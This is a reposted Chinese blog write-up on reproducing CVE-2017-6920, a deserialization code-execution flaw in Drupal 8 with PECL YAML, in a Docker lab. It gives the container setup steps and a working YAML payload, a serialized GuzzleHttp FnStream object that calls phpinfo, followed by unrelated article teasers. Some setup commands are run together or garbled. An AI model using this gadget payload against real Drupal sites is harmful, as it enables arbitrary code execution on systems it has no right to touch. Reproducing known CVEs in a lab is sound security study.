Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)

漏洞描述

  • 影响软件:Drupal
  • 方式:反序列化
  • 参考链接:CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
  • 效果:任意代码执行

漏洞环境及利用

搭建docker环境

环境启动后,访问 将会看到drupal的安装页面,一路默认配置下一步安装。 因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

访问ip:8080

 

  • 先安装 扩展yaml(在容器中!!!)
# 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源 
cd /etc/apt
这里官方提供的没有切换路径,需要自己切换以下,可以cat sources.list看有没有换源成功
cat << EOF > /etc/apt/sources.list
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
EOF
这里用阿里云的源,网易的失效了
#导入阿里源的公钥,否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C# 安装依赖 
apt update 
apt-get -y install gcc make autoconf libc-dev pkg-configapt-get -y install libyaml-dev 
# 安装yaml扩展 
pecl install yaml 
docker-php-ext-enable yaml.so# 启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini 
# 退出容器 exit# 重启容器,CONTAINER换成自己的容器ID docker restart CONTAINER

 

 payload

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

phpinfo成功执行,漏洞复现成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/173848.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SHEIN出口鼓风机清洁器美国站UL1017测试项目指南解析

鼓风机清洁器等家电产品的出口&#xff0c;进入亚马逊美国市场需要满足UL1017报告的相关要求。本文将详细解读鼓风机清洁器出口亚马逊美国站UL1017报告的办理流程、标准要求、周期及所需资料。 鼓风机清洁器办理UL报告流程&#xff1a; 选择一家合适的认证机构&#xff0c;并准…

vue 表格虚拟滚动

1.使用vxetable实现 官网 问题&#xff1a; 实现了表格的虚拟滚动&#xff0c;但是单元格数据不自动换行了 &#xff0c;如下显示的... 然后在官网看到是这样的&#xff0c;那我不是白写。。。 解决&#xff1a; 1.包一层div2.再写个换行样式 <vxe-column field"s…

uniapp之Vue3配置跨域(代理)

在uni-app中&#xff0c;我们可以使用vue.config.js文件来配置跨域&#xff08;代理&#xff09;。以下是一个示例&#xff1a; // vue.config.js module.exports {devServer: {proxy: {/api: { // 这里填写你要代理的接口前缀&#xff0c;例如/apitarget: http://localhost:…

个微协议开发/微信个人号二次开发/ipad协议/api接口

E云管家&#xff0c;是完整的第三方服务平台&#xff0c;并基于IPAD协议8.0.37开发出的最新个微API服务框架。 你可以 通过API 实现 个性化微信功能 &#xff08;例云发单助手、社群小助手、客服系统、机器人等&#xff09;&#xff0c;用来自动管理微信消息。用户仅可一次对接…

如何更好的设计测试用例,看完就懂了。。。

引言 测试用例设计的最基本要求&#xff1a;覆盖住所要测试的功能。这是再基本不过的要求了&#xff0c;但别看只是简单的一句话&#xff0c;要能够达到切实覆盖全面&#xff0c;需要对被测试产品功能的全面了解、明确测试范围(特别是要明确哪些是不需要测试的)、具备基本的测…

EasyExcel生成多sheet页的excel

一、controller层 ApiOperation(value "明细查询导出") PostMapping(value "/SummaryDetailExport") public void summaryDetailExport(RequestBody SearchDTO dto, HttpServletResponse response) throws IOException {reportService.deptPackagingSum…

北邮22级信通院数电:Verilog-FPGA(11)第十一周实验(1)用JK触发器实现8421码十进制计数器

北邮22信通一枚~ 跟随课程进度更新北邮信通院数字系统设计的笔记、代码和文章 持续关注作者 迎接数电实验学习~ 获取更多文章&#xff0c;请访问专栏&#xff1a; 北邮22级信通院数电实验_青山如墨雨如画的博客-CSDN博客 目录 一.代码部分 1.1 JK_8421.v 1.2 JK_ff.v …

swagger注解属性设置导致的报错:For input string: ““

使用swagger的时候&#xff0c;用 ApiModelProperty 修饰的类的属性如果没设置的话默认赋值为“”&#xff0c;当Integer类型的属性没设置example的话就会报错 错误设置&#xff1a; ApiModelProperty(value "设备id") private Integer typeId; Illegal DefaultV…

2023亚马逊云科技re:Invent,与全球合作伙伴探索更多发展可能

一年一度的全球云计算、科技圈的狂欢“Party”又双叒叕要来了&#xff01;2023年11月27日&#xff0c;2023亚马逊云科技re:Invent正式向全球云计算从业者、合作伙伴发出邀请&#xff0c;相聚拉斯维加斯&#xff0c;共同开启一场创新探索之旅&#xff01; 全球合作伙伴相约拉斯维…

OpenSSH(CVE-2023-38408)OpenSsh9.5一键升级修复

yum install -y git cd /root git clone https://gitee.com/qqmiller/openssh-9.5p1-.x86_64.git cd openssh-9.5p1-.x86_64/ bash openssh_update.sh重启sshd&#xff1a; systemctl restart sshd 查看sshd状态&#xff1a; systemctl status sshd

java异常问题处理 工具教程博客目录汇总

逆向工程文件example完美结合使用PageHelper分页插件-CSDN博客 sql语句操作 执行新增语句后返回主键属性_sql新增后返回主键-CSDN博客 虚拟机安装部署redis 启动 五种数据类型 key命令(过期时间) redis持久化方案-CSDN博客 redis集群搭建简单使用 项目中redis单机版连接池 集…

Pytorch-gpu环境篇

最最最头疼的就是配环境了 包之间的版本匹配问题 INSTALLING PREVIOUS VERSIONS OF PYTORCH 要考虑到pytorch和torchvision之间的匹配关系 显卡版本匹配问题

ESXi 添加新网络 配置ubuntu虚拟机双网卡

基本概念 在ESXi的虚拟机之间确保正常通信的基础是网络服务&#xff0c;通常在物理网络中需要使用不同的物理设备进行连接才能组建出高效的网络服务&#xff0c;而在虚拟网络中&#xff0c;需要不同的虚拟设备为其提供服务。 ESXi的网络类型&#xff1a; 1、物理网络&#xf…

jmeter监听器大家都会用,但我这个妙招能让你提早一小时下班!

使用过 jmeter 的同学&#xff0c;应该都会使用监听器&#xff0c;在每个监听器中&#xff0c;都会有一个“所有数据写入一个文件”的功能&#xff0c;那这个功能应该怎么用呢&#xff1f;今天&#xff0c;我们就来讲讲这个功能的使用。 几乎所有的监听器都有这样一个功能。 那…

计网Lesson1笔记

文章目录 几个简单概念计网的发展史阿帕网和RFCTCP/IP 协议互联网协议计网设计OSI 的七层架构TCP/IP 协议簇 几个简单概念 主机(host)&#xff1a;指单个计算机&#xff0c;比如PC&#xff0c;或者其他电子设备。端系统(end system)&#xff1a;指一块区域内的多个主机&#x…

秒杀系统总结

欢迎大家到我的博客浏览。秒杀系统总结 | YinKais Blog 秒杀&#xff1a;<!--more--> 做一个秒杀系统&#xff0c;我们需要与业务方进行沟通交流&#xff0c;了解清楚&#xff0c;才能设计出一个比较符合业务的系统&#xff0c;一般的流程会在后面进行一个阐述。 1、需…

bootstrapTable 显示内容过长,鼠标悬停展示全部

{ field :logisticsreturnapplymassage, valign : middle, title : 物流返回消息&#xff08;申请&#xff09;, align: center, …

在Windows WSL (Linux的Windows子系统)上运行的Ubuntu如何更改主机名

在Windows 安装的Ubuntu&#xff0c;如何修改主机名。有列了两种方法&#xff0c;提供给大家参照。 文章目录 方法一&#xff1a;hostname指令修改方法二&#xff1a;修改配置文件修改hostnanmewsl.conf 文件配置选项推荐阅读 方法一&#xff1a;hostname指令修改 hostname指…

logstash 配置文件语法介绍

大家好&#xff0c;我是蓝胖子&#xff0c;之前在构建服务监控实践那个系列里&#xff0c;有提到用logstash来做日志的收集&#xff0c;但是对于logstash的配置文件语法没有做很详细的介绍&#xff0c;今天就来详细聊聊logstash配置文件的语法。 很多时候一门新框架的配置都会有…

【虹科干货】ntopng如何将漏洞扫描与流量监控相结合,以提高网络安全性

ntopng为人所知的“身份”是被动流量监控。然而&#xff0c;如今的ntopng6.0也进化出主动监控功能来&#xff0c;漏洞扫描功能便是其中一个。那么漏洞扫描功能是什么&#xff1f;其独特之处是什么&#xff1f;用户该如何使用&#xff1f; 新的漏洞扫描和CVE支持&#xff0c;可…